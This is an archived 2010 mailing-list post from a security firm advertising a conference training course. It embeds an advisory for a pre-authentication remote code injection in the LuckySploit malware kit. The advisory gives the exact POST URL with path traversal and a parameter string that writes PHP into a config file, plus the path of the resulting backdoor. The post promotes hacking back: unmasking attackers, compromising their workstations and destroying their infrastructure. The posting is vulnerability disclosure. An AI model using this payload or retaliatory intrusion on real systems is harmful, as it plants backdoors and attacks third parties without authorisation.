[<prev] [next>] [day] [month] [year] [list]
Message-ID: <4C863795.3070506@tehtri-security.com>
Date: Tue, 07 Sep 2010 15:01:09 +0200
From: Laurent OUDOT at TEHTRI-Security <laurent.oudot@...tri-security.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: [TEHTRI-Security Training + 0days] "Hunting Web Attackers" at HITBSecConf
Gents,
We wanted to let you know that TEHTRI-Security will release many 0days
and offensive technologies during a new training called :
- "Hunting Web Attackers"
It will be proposed during HackInTheBox SecConf Malaysia 2010 in
October, in Kuala Lumpur.
The 0days will be disclosed under a NDA (for students only) and will
help at fighting back web attackers, as we already explained in the past
in China and in Singapore (SyScan).
As a teaser, this email contains one of our remote 0day exploits. We
also found 0days against Zeus, Eleonore, CrimePack, etc.
Our self-defense cyber-weapons will be disclosed during this training.
------ BEGIN Security Advisory ------
Vuln : TEHTRI-SA-2010-018
Tool : LuckySploit Exploit Pack
Title: Remote execution in LuckySploit
LuckySploit is a tool used by attackers to penetrate companies or
personal computers by abusing client-side vulnerabilities. This malware
exploitation kit is full of anti Microsoft technologies.
By auditing this Malware, TEHTRI-Security has found a pre-auth remote
exploit in the file /mod/to.php
By sending a specially crafted HTTP packet with a POST argument, it's
possible to simulate a configuration modification, and to inject PHP
code that will be able to be executed after.
Here is an example, where we modify the remote file "7.php" by adding
our own PHP code inside it (PoC anti kiddies: phpinfo() added).
POST sent to
http://target/luckysploit/mod/to.php?mod=thread_optn&id=../../tconf/7
With arguments :
z=1&exp_pre_config=2&advanced_unik=0&referer_not_empty=0&JS_MODE=0&unquie_type=0&unquie_time=10000000%3Bphpinfo%28%29%3Bexit%28%29%3B%3F%3Eaa&stat_packtime=10&country_allow_list=&referer_only=&traff_back_url=&gzip_status=1&gzip_status2=1&ip2cos=1&system_status=1&referer_status=1&puniqstatus=1&puniqblock=0
Then you can access your new remote backdoor here :
http://target/luckysploit/tconf/7.php
This exploit is provided by TEHTRI-Security as a technical proof to show
that defenders who are under attack, might be able to strike back
against a group of evil intruders trying to commit cyber crimes against
them. But this should not be used out of legal field.
This might help at getting the identities of attackers, or at hacking
their workstations, or at destroying their tools and infrastructures
(anti-cyber-war & anti-cyber-spy technologies).
------ END Security Advisory ------
If you want to be sure to have your seat for this outstanding offensive
training, please do register as soon as possible (Technical Training
Track3 / TT3 - Hunting Web Attackers, 11-12 October ) :
http://conference.hackinthebox.org/hitbsecconf2010kul/?page_id=274
See you soon at the awesome international conference HITBSecConf
Malaysia 2010,
Laurent OUDOT, CEO & Founder TEHTRI-Security
http://www.tehtri-security.com/
* References:
- BBC => http://www.bbc.co.uk/news/10349001
- Zdnet =>
http://www.zdnet.com/blog/security/researchers-find-12-zero-day-flaws-targeting-5-web-malware-exploitation-kits/6752
- Btraq => http://seclists.org/bugtraq/2010/Jun/178
- HITB => http://conference.hackinthebox.org/hitbsecconf2010kul/
Powered by blists - more mailing lists